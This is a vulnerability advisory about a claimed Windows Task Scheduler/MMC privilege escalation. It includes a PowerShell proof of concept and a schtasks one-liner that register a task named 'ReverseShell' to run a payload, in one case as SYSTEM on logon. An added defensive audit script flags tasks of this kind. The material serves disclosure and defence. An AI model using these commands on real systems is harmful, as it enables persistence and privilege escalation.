Microsoft Windows Task Scheduler Local Privilege Escalation
Posted Jul 19, 2019
Authored by Social Engineering Neo

Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the 'administrators' group via the GUI, and MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC, potentially leading to unintentional elevation of privilege.

tags | exploit, local
systems | windows
MD5 | 8e6e723a39a4d2907bdf7a5b25c884e6

Microsoft Windows Task Scheduler local EoP Report by Social Engineering Neo.

Affected Platforms: -
Microsoft Windows ≤10

Tested On: -
Windows 10 (build 1809, 1903) & Windows 7 SP1.
Tested on the most recent security patch. (July 2019)

Class: -
Improper Authorization - (CWE-285).
Remote Code Execution.

Summary: - The typical computer user can trigger programs at intervals on any account existing on the host system/domain without proper authorization.

Short Description: - The Windows MMC auto-elevates members of the 'administrators' group via the GUI; MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC, potentially leading to unintentional EoP.

Long Description: - The built-in Windows component 'Microsoft Management Console' is potentially affected by improper authorization. MMC snap-ins (.msc) auto-elevate users existing in the 'administrators' group including administrator accounts.
: - Only the GUI seems to be affected. This is shown with our simple PowerShell script: when you adjust '-Daily -At 9pm' to '-AtLogOn' or '-AtStartUp', additional permissions are required.
: - Whereas the GUI allows "-AtLogOn" without additional permissions.
: - An attacker with the ability to execute 'taskschd.msc' with arguments through the CLI is able to perform this attack with elevated permissions as a payload; therefore exploitability is greatly increased.
: - HIDS/HIPS without specific configurations may not detect such events as alerts or warnings and simply log the event instead, increasing the chances of a system administrator looking past the issue.
: - Enterprise/personal systems complying with basic security practices are less likely to be affected; the average computer user with a default system configuration could be vulnerable to such attacks.

Proof of Concept: - (PowerShell)
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."

#The above PowerShell script will create a task titled "ReverseShell" with the description "This Task Will Run the Reverse Shell."
#Some additional configuration of the PowerShell may be required.
#We have our own reverse shell payload; it's up to you "the attacker" to create your own payload.
#NOTE: Task should run every day at 9pm (system time). You can change this to what suits your needs.
# Task will only have 'user' permissions; this PoC only exists to prove that modifying line 9, col 39 & line 3, col 28 to either "AtLogOn" or "AtStartUp" will result in access denied.
# The GUI is automatically elevated, whereas the CLI is not.
# ***We have later noticed this PoC is essentially the same as running `schtasks.exe /Create /SC ONLOGON /TN ReverseShell /TR C:\Users\seneo\Documents\payload-x64.exe /RU "NT AUTHORITY\SYSTEM"` *additional permissions needed for CLI, not GUI*
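As an added audit example (not part of the original report), the following PowerShell enumerates non-Microsoft scheduled tasks and flags the pattern described above: a task that runs as a privileged principal or on logon/boot although its recorded Author is not a member of the local Administrators group. It assumes the ScheduledTasks and Microsoft.PowerShell.LocalAccounts modules are available (Windows 8 / PowerShell 5.1 or later); the function name and the path exclusion list are my own choices.

```powershell
# Audit example added here (not from the advisory): list non-Microsoft tasks
# that run as a privileged principal or on logon/boot although their recorded
# Author is not a local administrator. Needs the ScheduledTasks and
# Microsoft.PowerShell.LocalAccounts modules (Windows 8 / PowerShell 5.1+).
Import-Module ScheduledTasks

function Get-SuspiciousScheduledTask {
    [CmdletBinding()]
    param(
        # Task paths to skip; Windows' own tasks live under \Microsoft\.
        [string[]]$ExcludePath = @('\Microsoft\')
    )
    # Local Administrators members, lower-cased for comparison. The task's
    # Author field is self-reported XML metadata, so treat it as a hint only.
    $admins = @()
    try {
        $admins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction Stop |
                  ForEach-Object { $_.Name.ToLowerInvariant() }
    } catch {
        Write-Warning "Cannot read local Administrators group: $_"
    }
    $privilegedIds = @('system', 'nt authority\system', 'localsystem',
                       'administrators', 'builtin\administrators')

    foreach ($task in Get-ScheduledTask) {
        if ($ExcludePath | Where-Object { $task.TaskPath -like "$_*" }) { continue }
        $runAs    = [string]$task.Principal.UserId
        $runLevel = [string]$task.Principal.RunLevel
        $author   = [string]$task.Author
        $triggers = @($task.Triggers | ForEach-Object { $_.CimClass.CimClassName })
        # Logon/boot triggers fire with no user interaction, the case the
        # report says the GUI allows without extra permissions.
        $autoTrigger   = [bool]($triggers -match 'MSFT_Task(Logon|Boot)Trigger')
        $privileged    = ($privilegedIds -contains $runAs.ToLowerInvariant()) -or ($runLevel -eq 'Highest')
        $authorIsAdmin = ($author -ne '') -and ($admins -contains $author.ToLowerInvariant())
        if (($privileged -or $autoTrigger) -and -not $authorIsAdmin) {
            [pscustomobject]@{
                TaskPath = $task.TaskPath
                TaskName = $task.TaskName
                Author   = $author
                RunAs    = $runAs
                RunLevel = $runLevel
                Triggers = ($triggers -join ',')
                Actions  = (($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; ')
            }
        }
    }
}

Get-SuspiciousScheduledTask | Format-Table -AutoSize
```

Run it from an elevated session so that tasks registered by other users are visible; a task whose Author is a standard user but whose RunAs is SYSTEM, or that has a logon/boot trigger, is the case worth investigating.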

VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
: - https://youtu.be/_leFNyo5wxM **original**

Expected Result: -
Normal users should not be able to run tasks as other users and execute programs on accounts without proper authorization.

Observed Result: -
Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromise.

Our Recommendation: -
System Administrators should follow basic security practices to prevent enterprise/client systems being affected with this issue.
Microsoft should prevent the Microsoft Management Console (MMC) snap-ins from auto-elevating without UAC authorization.
The average user should be informed about attacks like this because most "average" users will not understand how they can be affected by attacks such as this.
Proper access control implementations will greatly reduce risk towards enterprise systems.

NVD CVSS v3 Vector: -

CVSS Base Score: - 8.2
Impact Sub score: - 6.0
Exploitability Sub score: - 1.5
CVSS Temporal Score: - 7.2
CVSS Environmental Score: - 5.7
Modified Impact Sub score: - 4.5
Overall CVSS Score: - 5.7

NVD CVSS v2 Vector: -

CVSS Base Score: - 6.8
Impact Sub score: - 10.0
Exploitability Sub score: - 3.1
CVSS Temporal Score: - 5.5
CVSS Environmental Score: - 4.8
Modified Impact Sub score: - 7.3
Overall CVSS Score: - 4.8

MITRE CVSS Vector: -
Base Vector: - AV:L/AC:L/Au:S/C:C/I:C/A:C
Base Score: - 6.8

TIMELINE: - Discovery 5th July 2019
: - Initial Report 5th July 2019
: - Case Opened 8th July 2019
: - Added Detail 8th July 2019 *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019
: - Case Closed 9th July 2019
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019 *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)

: - We thank the MSRC team for their quick response.

